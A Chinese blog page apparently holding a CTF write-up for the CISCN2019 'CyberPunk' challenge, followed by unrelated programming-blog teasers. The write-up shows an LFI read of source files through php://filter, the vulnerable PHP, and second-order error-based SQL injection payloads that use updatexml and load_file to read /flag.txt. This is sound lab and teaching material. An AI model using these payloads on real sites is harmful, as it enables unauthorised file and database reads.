当前位置：首页 > news >正文

[CISCN2019 华北赛区 Day1 Web5]CyberPunk 二次报错注入

news 2025/8/22 0:06:08

buu上做点

首先就是打开环境开始信息收集

发现源代码中存在?file

提示我们多半是包含

我原本去试了试 ../../etc/passwd

失败了直接伪协议上吧

php://filter/read=convert.base64-encode/resource=index.phpconfirm.phpsearch.phpchange.phpdelete.php

我们通过伪协议全部读取

我们提取关键信息

index.php

ini_set('open_basedir', '/var/www/html/');// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {echo('no way!');exit;}@include($file);
}
?>

confirm.php

<?phprequire_once "config.php";
//var_dump($_POST);if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{$msg = '';$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';$user_name = $_POST["user_name"];$address = $_POST["address"];$phone = $_POST["phone"];if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){$msg = 'no sql inject!';}else{$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";$fetch = $db->query($sql);}if($fetch->num_rows>0) {$msg = $user_name."已提交订单";}else{$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";$re = $db->prepare($sql);$re->bind_param("sss", $user_name, $address, $phone);$re = $re->execute();if(!$re) {echo 'error';print_r($db->error);exit;}$msg = "订单提交成功";}
} else {$msg = "信息不全";
}
?>

change.php

<?phprequire_once "config.php";if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{$msg = '';$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';$user_name = $_POST["user_name"];$address = addslashes($_POST["address"]);$phone = $_POST["phone"];if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){$msg = 'no sql inject!';}else{$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";$fetch = $db->query($sql);}if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];$result = $db->query($sql);if(!$result) {echo 'error';print_r($db->error);exit;}$msg = "订单修改成功";} else {$msg = "未找到订单!";}
}else {$msg = "信息不全";
}
?>

delete.php

<?phprequire_once "config.php";if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{$msg = '';$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';$user_name = $_POST["user_name"];$phone = $_POST["phone"];if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!';}else{$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";$fetch = $db->query($sql);}if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();$result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);if(!$result) {echo 'error';print_r($db->error);exit;}$msg = "订单删除成功";} else {$msg = "未找到订单!";}
}else {$msg = "信息不全";
}
?>

search.php

<?phprequire_once "config.php"; if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{$msg = '';$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';$user_name = $_POST["user_name"];$phone = $_POST["phone"];if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ $msg = 'no sql inject!';}else{$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";$fetch = $db->query($sql);}if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();if(!$row) {echo 'error';print_r($db->error);exit;}$msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";} else {$msg = "未找到订单!";}
}else {$msg = "信息不全";
}
?>

首先进行判断

每个文件中都存在过滤即

$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';

同时都是对

 if (preg_match($pattern,$user_name) || preg_match($pattern,$phone))

进行处理但是我们能发现一个地方是没有进行处理的

在change.php的

    $address = addslashes($_POST["address"]);

是不存在正则处理的这里就给我们实现了注入的地方

这里的注入流程是这样的

我们使用报错注入updatexml我们首先通过输入 updatexml存入数据库例如' and updatexml(1,,0x7e,2)#就会作为 adress 原封不动的存入数据库这个时候我们再一次通过修改地址来修改因为其中的语句$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];会将原本的地址作为 old_address 输入所以语句会修改为$sql = "update `user` set `address`='".$address."', `old_address`='"' and updatexml(1,,0x7e,2)#"' where `user_id`=".$row['user_id'];重点是在
`old_address`='"' and updatexml(1,,0x7e,2)#"'这里因为执行语句后 通过 updatexml() 会执行报错 if (isset($fetch) && $fetch->num_rows>0){$row = $fetch->fetch_assoc();if(!$row) {echo 'error';print_r($db->error);exit;}这样我们就实现了注入

写入报错语句

对语句进行更新这样旧地址会输入到句子中

实现了报错

但是这道题不在数据库中。。。。。

也不知道师傅们怎么做出来的

使用 load_file()函数

' and updatexml(1,concat(0x7e,(select load_file('/flag.txt'))),3)#

实现了报错

但是长度不够

我们通过substr即可

' and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,60))),3)#

这道题确实不是特别难但是其实还是不是很简单。。。。

[CISCN2019 华北赛区 Day1 Web5]CyberPunk 二次报错注入

buu上做点首先就是打开环境开始信息收集发现源代码中存在?file 提示我们多半是包含我原本去试了试 ../../etc/passwd 失败了直接伪协议上吧 php://filter/readconvert.base64-encode/resourceindex.phpconfirm.phpsearch.phpchange.phpdelete.php 我们通过伪协议全…...

编程日记 2023/10/8 11:19:59

双机并联逆变器自适应虚拟阻抗下垂控制（Droop）策略Simulink仿真模型

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势：🌞🌞🌞博客内容尽量做到思维缜密，逻辑清晰，为了方便读者。 ⛳️座右铭&a…...

编程日记 2023/10/8 11:18:58

8月份，誉天79名学员通过HCIE认证！

八月份，誉天又有79名学员顺利通过了HCIE认证，其中：云计算46人、Datacom14人、云服务8人、存储7人、安全3人、大数据1人。一起祝贺他们吧~...

编程日记 2023/10/8 11:17:57

Quarto 入门教程 (2)：如何使用并编译出不同文档

接着上一期内容：手把手教你使用 Quarto 构建文档 (1)，本文介绍如何使用 Quarto，并编译出文档（PDF，MS Word，html）等。安装根据官方链接，选择适合自己电脑的 Quarto 版本并下载&am…...

编程日记 2023/10/8 11:13:53

【C++设计模式之命令模式:行为型】分析及示例

简介命令模式是一种行为型设计模式，它将请求封装成一个对象，从而使不同的请求可以被参数化、队列化或记录化。这种模式允许请求的发送者和接收者进行解耦，同时提供更高的灵活性和可扩展性。描述命令模式的核心思想是通过命令对象来封装…...

编程日记 2023/10/8 11:11:52

二、Excel VBA 简单使用

Excel VBA 从入门到出门一、Excel VBA 是个啥？二、Excel VBA 简单使用 👋Excel VBA 简单使用 ⚽️1. 如何在Excel中手动编写VBA代码⚽️2. 如何在 Excel 中运行 VBA 代码⚽️3. 如何在Excel中记录VBA代码⚽️4. 如何在Excel中编辑录制的VBA代码⚽️5. 如…...

编程日记 2023/10/8 11:10:51

方式一 final String queryString request.getQueryString(); System.out.println(queryString); //解码 System.out.println(URLDecoder.decode(queryString, StandardCharsets.UTF_8));测试： pageSize25&pageNum1&sort%5B%27id%27%5Ddesc&sort%5B%…...

编程日记 2023/10/8 11:09:49

python入门篇07-数据容器(序列集合字典,json初识)基础(下)

全文目录,一步到位 1.前言简介1.1 专栏传送门1.1.1 上文传送门 2. python基础使用2.1 序列2.1.1 序列定义2.1.2 序列参数解释2.1.3 列表list切片2.1.4 元组tuple切片2.1.5 字符串str切片 2.2 集合定义2.2.1 set集合-基本语法2.2.2 set集合-添加元素.add()2.2.3 set集合- 移除元…...

编程日记 2023/10/8 11:04:45

阿里云服务器公网带宽价格表“按固定带宽”计费模式

阿里云服务器公网带宽计费模式按固定带宽”计费多少钱1M？地域不同带宽价格不同，北京、杭州、深圳等大陆地域价格是23元/Mbps每月，中国香港1M带宽价格是30元一个月，美国硅谷是30元一个月，日本东京1M带宽是25元一个月&am…...

编程日记 2023/10/8 11:00:42

MTK的充电方案—PMIC充电

MTK目前有三套充电方案，主要如下： （1）线性充电——linering charge(PMIC充电） 充9停1，充电电流不能太大，目前最大能做到1.2A； （2）switch charge&#xff08…...

编程日记 2023/10/8 10:59:41

【Overload游戏引擎分析】画场景栅格的Shader分析

Overload引擎地址： GitHub - adriengivry/Overload: 3D Game engine with editor 一、栅格绘制基本原理 Overload Editor启动之后，场景视图中有栅格线，这个在很多软件中都有。刚开始我猜测它应该是通过绘制线实现的。阅读代码发现&#xff0…...

编程日记 2023/10/8 10:58:39

智能化物流管理：全国快递物流查询API的角色与优势

前言当今社会，物流行业已经成为了国民经济的重要组成部分，而快递物流则是物流行业中的一个重要分支。随着信息技术的不断发展，智能化物流管理正逐渐成为快递物流领域的趋势，而全国快递物流查询API作为其中的一部分，在…...

编程日记 2023/10/8 10:57:38

Spring Boot如何配置CORS支持

Spring Boot如何配置CORS支持 CORS（跨源资源共享）是一种Web浏览器的安全性功能，用于控制网页上的脚本文件从不同的源加载其他网页资源。在开发现代Web应用程序时，通常需要跨域请求不同的资源，如API服务或其他Web应用程…...

编程日记 2023/10/8 10:56:37

Mybatis 拦截器（Mybatis插件原理）

Mybatis为我们提供了拦截器机制用于插件的开发，使用拦截器可以无侵入的开发Mybatis插件，Mybatis允许我们在SQL执行的过程中进行拦截，提供了以下可供拦截的接口： Executor：执行器ParameterHandler：参数处理…...

编程日记 2023/10/8 10:54:34

AXI总线协议基础--几分钟熟悉通道信号和基础架构

目录一、AXI协议基础 1.1读写通道的基本架构图 1.2猝发操作举例 1.3传输顺序二、各个通道中的信号描述 2.1全局信号 2.2写地址通道信号 2.3写数据通道信号 2.4写响应通道信号 2.5读地址通道信号 2.6读数据通道三、通道握手 3.1单一信息传输时的握手过程 3.2不…...

编程日记 2023/10/8 10:52:33

matlab数学建模方法与实践笔记汇总

matlab数学建模方法与实践笔记汇总写在最前面笔记1：快速入门1.导入数据2.数据探索3.多项式拟合4.发布功能5.数据类型6、全部代码笔记2：数据的准备1.数据的读取与写入excel、txt读图读视频 2.数据预处理缺失值噪声过滤数据归约数据变换 3.数据统计4.数…...

编程日记 2023/10/8 10:50:31

[UE虚幻引擎] DTCopyFile 插件说明 – 使用蓝图拷贝复制文件 (Windows)

本插件可以在虚幻引擎中使用蓝图对系统的其他文件进行拷贝复制操作。 1. 节点说明 Async Copy File 异步复制文件 Param Source File : 要复制的源文件的完整路径。Param Target File : 要复制的目标文件的完整路径。Param Force Copy : 如果为true，则如果目标…...

编程日记 2023/10/8 10:49:30